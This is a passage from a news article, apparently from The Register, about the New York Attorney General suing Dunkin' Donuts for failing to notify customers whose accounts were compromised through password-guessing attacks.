“Dunkin’ failed to take any steps to protect these nearly 20,000 customers — or the potentially thousands more they did not know about — by notifying them of unauthorized access, resetting their account passwords to prevent further unauthorized access, or freezing their DD cards,” the AG’s office said of the suit.

“Dunkin’ also failed to conduct any investigation into or analysis of the attacks to determine how many more customer accounts had been compromised, what customer information had been acquired, and whether customer funds had been stolen.”

According to James, the crooks brute-forced their way into these customer accounts by simply guessing people’s passwords.

NYC

Time Warner Cable, you’ve ‘earned your miserable reputation’ – NY Attorney General

READ MORE

The Attorney General alleges that DD was aware of the pilfering yet failed to notify punters that their accounts had been compromised.

“Dunkin’ failed to protect the security of its customers,” James said. “And instead of notifying the tens of thousands impacted by these cybersecurity breaches, Dunkin’ sat idly by, putting customers at risk.”

The Attorney General is now filing suit against the donut chain in hopes of getting back some of the money lost to the thieves, claiming the chain has violated the state’s data breach notification statute as well as consumer protection laws that require companies to accurately disclose the measures they take to protect customer accounts.

The lawsuit seeks an injunction against the sugar-slingers as well as a payout to customers and a fine for violating state laws. Dunkin’ did not have comment at time of going to press. ®

Sponsored:
Beyond the Data Frontier

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/09/26/dunkin_donuts_leak_suit/